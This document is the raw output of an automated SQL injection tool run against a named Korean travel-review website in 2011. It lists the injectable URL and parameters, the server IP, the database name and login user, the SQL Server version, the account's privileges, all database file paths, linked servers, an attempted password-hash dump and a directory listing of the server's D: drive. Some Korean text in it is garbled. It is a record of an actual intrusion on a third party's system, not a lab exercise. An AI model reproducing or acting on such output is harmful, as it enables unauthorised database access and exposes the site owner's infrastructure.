■漏洞信息:============================================================
 ・URL:http://newreview.nomad21.com/default.asp?score=96&insPage=dome&mode=cList&pid=167&tableName=bestfood&category=B03&city_code=A42
 ・页面标题：⑵⑵⑵ 咯青磊啊 父靛绰 咯青府轰固叼绢 - [傈林]海抛尔 漠惫荐 (傈合) ⑵⑵⑵
 ・参数:score=96&insPage=dome&mode=cList&pid=167&tableName=bestfood&category=B03&city_code=A42
 ・方法:GET
 ・类型:String
 ・利用方法:And
 ・脚本语言:asp
 ・IP:221.143.50.136
 ・数据库:SQL Server
 ・HEAD:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 03 Apr 2011 15:31:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: CP='CAO PSA CONi OTR OUR DEM ONL'
pragma: no-cache
Content-Length: 104376
Content-Type: text/html
Expires: Sun, 03 Apr 2011 15:30:01 GMT
Set-Cookie: ASPSESSIONIDCABRTQAA=KBIEJDDDICCPBKEEAGCJBJJG; path=/
Cache-control: private



■数据库信息:============================================================
- 数据库名：tourmall
- 用户名：nomadtour
- 版本：Microsoft SQL Server  2000 - 8.00.2039 (Intel X86) 
	May  3 2005 23:18:38 
	Copyright (c) 1988-2003 Microsoft Corporation
	Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2)

- 服务器名：NOMAD21-COM
- 服务名：MSSQLSERVER
- 系统用户名：nomadtour

 ・当前用户权限：
sysadmin(sa): 0
dbcreator): 0
bulkadmin: 0
diskadmin: 0
serveradmin: 0
public: 1
db_owner: 1
db_backupoperator: 0
db_datawriter: 0

 ・数据库信息:
db_name	filename
----------------------------------------------------------------------------------------------------
21segi	C:\Program Files\Microsoft SQL Server\MSSQL\Data\21segi_Data.MDF	
bbs	C:\Program Files\Microsoft SQL Server\MSSQL\Data\bbs_Data.MDF	
EuroPension	C:\Program Files\Microsoft SQL Server\MSSQL\Data\EuroPension_Data.MDF	
master	C:\Program Files\Microsoft SQL Server\MSSQL\data\master.mdf	
model	C:\Program Files\Microsoft SQL Server\MSSQL\data\model.mdf	
msdb	C:\Program Files\Microsoft SQL Server\MSSQL\data\msdbdata.mdf	
ndb_Travel_Inside	C:\Program Files\Microsoft SQL Server\MSSQL\data\ndb_Travel_Inside_Data.MDF	
Nomad_mail	C:\Program Files\Microsoft SQL Server\MSSQL\Data\Nomad_mail.mdf	
nomadAD	C:\Program Files\Microsoft SQL Server\MSSQL\data\nomadAD_Data.MDF	
Northwind	C:\Program Files\Microsoft SQL Server\MSSQL\data\northwnd.mdf	
pubs	C:\Program Files\Microsoft SQL Server\MSSQL\data\pubs.mdf	
shopping	C:\Program Files\Microsoft SQL Server\MSSQL\Data\shopping_Data.MDF	
singapore	C:\Program Files\Microsoft SQL Server\MSSQL\Data\singapore_Data.MDF	
tempdb	C:\Program Files\Microsoft SQL Server\MSSQL\data\tempdb.mdf	
tourbbs	C:\Program Files\Microsoft SQL Server\MSSQL\Data\tourbbs_Data.MDF	
tourmall	C:\Program Files\Microsoft SQL Server\MSSQL\Data\tourmall_Data.MDF	

 ・SQL Server用户名列表：
用户名		角色		安全编号
----------------------------------------------------------------------------------------------------
dbo			08  6 2000  1:27AM	
guest	.	.	08  6 2000  1:27AM	

 ・数据库相关进程信息:
程序名	状态	主机名	主机进程ID	命令行	NT用户名
----------------------------------------------------------------------------------------------------
取记录数失败，使用设定值：5
SQLAgent - Generic Refresher	sleeping	NOMAD21-COM	2920	AWAITING COMMAND	SQL_START	
SQLAgent - Alert Engine	sleeping	NOMAD21-COM	2920	AWAITING COMMAND	SQL_START	
Microsoft㈢ Windows㈢ Operating System	sleeping	NOMAD21-COM	2588	AWAITING COMMAND		
Microsoft㈢ Windows㈢ Operating System	sleeping	NOMAD21-COM	2588	AWAITING COMMAND		
Microsoft㈢ Windows㈢ Operating System	sleeping	NOMAD21-COM	2588	AWAITING COMMAND		

 ・链接的服务器信息:
服务器名	服务器产品	提供者名	数据源	位置	服务器网络名
----------------------------------------------------------------------------------------------------
NOMAD21-COM	SQL Server	SQLOLEDB	NOMAD21-COM		NOMAD21-COM	

 ・数据库用户登录信息：
用户名	密码HASH	数据库编号	语言	时间1	时间2
----------------------------------------------------------------------------------------------------
取记录数失败，使用设定值：5

Dir of D:: 

归诀磊丰\
阂鞘夸磊丰\
捞傈官帕拳搁\
AQTRONIX WebKnight\
DB_Backup\
IIsLog\
Mail_Backup\
RECYCLER\
System Volume Information\
www\
皋老拌沥 巩辑.txt
SQL.txt

